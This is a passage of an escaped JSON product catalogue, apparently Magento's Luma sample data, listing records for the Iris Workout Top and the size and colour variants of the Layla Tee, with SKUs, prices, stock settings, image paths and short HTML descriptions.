config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1381\":{\"sku\":\"WS03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Lycra&reg;|Polyester|Spandex|TENCEL,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS03-XS-Blue,size=XS,color=Blue|sku=WS03-XS-Green,size=XS,color=Green|sku=WS03-XS-Red,size=XS,color=Red|sku=WS03-S-Blue,size=S,color=Blue|sku=WS03-S-Green,size=S,color=Green|sku=WS03-S-Red,size=S,color=Red|sku=WS03-M-Blue,size=M,color=Blue|sku=WS03-M-Green,size=M,color=Green|sku=WS03-M-Red,size=M,color=Red|sku=WS03-L-Blue,size=L,color=Blue|sku=WS03-L-Green,size=L,color=Green|sku=WS03-L-Red,size=L,color=Red|sku=WS03-XL-Blue,size=XL,color=Blue|sku=WS03-XL-Green,size=XL,color=Green|sku=WS03-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Lycra&reg;|Polyester|Spandex|TENCEL\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1382\":{\"sku\":\"WS04-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-XS-Blue\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1383\":{\"sku\":\"WS04-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-XS-Green\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1384\":{\"sku\":\"WS04-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-XS-Red\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1385\":{\"sku\":\"WS04-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-S-Blue\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1386\":{\"sku\":\"WS04-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-S-Green\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1387\":{\"sku\":\"WS04-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-S-Red\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1388\":{\"sku\":\"WS04-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-M-Blue\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1389\":{\"sku\":\"WS04-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-M-Green\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 